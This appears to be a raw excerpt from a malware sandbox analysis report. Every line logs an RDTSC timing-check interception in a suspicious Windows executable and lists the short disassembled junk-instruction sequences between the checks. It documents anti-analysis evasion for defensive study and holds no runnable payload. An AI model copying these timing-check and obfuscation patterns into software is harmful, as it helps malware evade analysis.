Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE116D second address: AE1177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE1177 second address: AE1183 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BD0FFF0C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE12E9 second address: AE12F3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5BD0C7BA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE12F3 second address: AE12FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE12FD second address: AE1303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7B91 second address: AE7B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7B97 second address: AE7BCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F5BD0C7BA7Dh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F5BD0C7BA68h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7BCB second address: AE7BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7BD1 second address: AE7BED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5BD0C7BA6Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7CD3 second address: AE7CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7CD9 second address: AE7CEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F5BD0C7BA66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7CEE second address: AE7D11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5BD0FFF0D0h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AECB59 second address: AECB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71409 second address: A71411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71411 second address: A71415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71415 second address: A7143D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BD0FFF0C6h 0x00000008 jl 00007F5BD0FFF0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BD0FFF0D4h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7143D second address: A71449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F5BD0C7BA66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71449 second address: A71465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AEC09B second address: AEC0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AEC4B9 second address: AEC4CA instructions: 0x00000000 rdtsc 0x00000002 je 00007F5BD0FFF0C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4003 second address: AF4012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F5BD0C7BA66h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4166 second address: AF4182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F5BD0FFF0C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4182 second address: AF4199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5BD0C7BA71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4199 second address: AF419F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF419F second address: AF41A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF41A5 second address: AF41A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF41A9 second address: AF41BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F5BD0C7BA66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF41BC second address: AF41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4487 second address: AF448B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF448B second address: AF44BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007F5BD0FFF0C6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F5BD0FFF0C6h 0x00000019 jc 00007F5BD0FFF0C6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF44BD second address: AF44C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4607 second address: AF4621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F5BD0FFF0C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4621 second address: AF4625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF48AC second address: AF48B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4B89 second address: AF4B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4B8D second address: AF4BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5BD0FFF0D5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4BB7 second address: AF4BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4CFB second address: AF4D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BD0FFF0D5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4D15 second address: AF4D3D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BD0C7BA72h 0x00000008 jnc 00007F5BD0C7BA66h 0x0000000e jns 00007F5BD0C7BA66h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5BD0C7BA70h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4EA9 second address: AF4EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4EAE second address: AF4EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F5BD0C7BA66h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F5BD0C7BA6Eh 0x00000016 jmp 00007F5BD0C7BA70h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f je 00007F5BD0C7BA66h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF5498 second address: AF54AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F5BD0FFF0CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF54AF second address: AF54B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF54B5 second address: AF54D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BD0FFF0CFh 0x0000000a ja 00007F5BD0FFF0CCh 0x00000010 jng 00007F5BD0FFF0C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF54D9 second address: AF54DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFABE4 second address: AFABEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F5BD0FFF0C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFABEF second address: AFABFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jng 00007F5BD0C7BA66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFABFD second address: AFAC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAD71 second address: AFAD83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F5BD0C7BA6Ah 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAD83 second address: AFAD8D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BD0FFF0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAF25 second address: AFAF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F5BD0C7BA88h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAF37 second address: AFAF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB2D3 second address: AFB2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5BD0C7BA66h 0x0000000a pop ebx 0x0000000b jns 00007F5BD0C7BA6Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB2EA second address: AFB2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB2EF second address: AFB2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB2FB second address: AFB301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB301 second address: AFB30A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB30A second address: AFB345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BD0FFF0D9h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F5BD0FFF0D2h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB6EF second address: AFB701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5BD0C7BA66h 0x0000000a jno 00007F5BD0C7BA66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB701 second address: AFB706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB706 second address: AFB723 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BD0C7BA6Eh 0x00000008 jno 00007F5BD0C7BA66h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jnp 00007F5BD0C7BA66h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB9D3 second address: AFB9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0FFF0D2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB9ED second address: AFB9F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFB9F5 second address: AFB9FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFBD40 second address: AFBD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A749F0 second address: A749F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A749F6 second address: A749FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A749FB second address: A74A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F5BD0FFF0C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B00D77 second address: B00D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABB790 second address: ABB794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABB839 second address: ABB862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F5BD0C7BA77h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABB862 second address: ABB8BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub edi, dword ptr [ebp+12A32BF2h] 0x00000010 call 00007F5BD0FFF0C9h 0x00000015 jmp 00007F5BD0FFF0D1h 0x0000001a push eax 0x0000001b jmp 00007F5BD0FFF0CAh 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jne 00007F5BD0FFF0D2h 0x0000002a mov eax, dword ptr [eax] 0x0000002c push ecx 0x0000002d js 00007F5BD0FFF0CCh 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABB8BD second address: ABB8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BD0C7BA6Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABB8D4 second address: ABB8E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABB9AA second address: ABB9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABBA8E second address: ABBAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABBAAE second address: ABBAB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABBB52 second address: ABBB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC501 second address: ABC51A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0C7BA6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC51A second address: ABC520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B01044 second address: B01061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA77h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B011BD second address: B011C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B011C3 second address: B011CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BD0C7BA6Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0145C second address: B01460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B01460 second address: B0147A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jp 00007F5BD0C7BA6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0147A second address: B0147E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0160F second address: B01630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5BD0C7BA66h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0C7BA74h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0198B second address: B01990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B01990 second address: B0199C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F5BD0C7BA66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0616B second address: B06176 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B0835F second address: B08363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
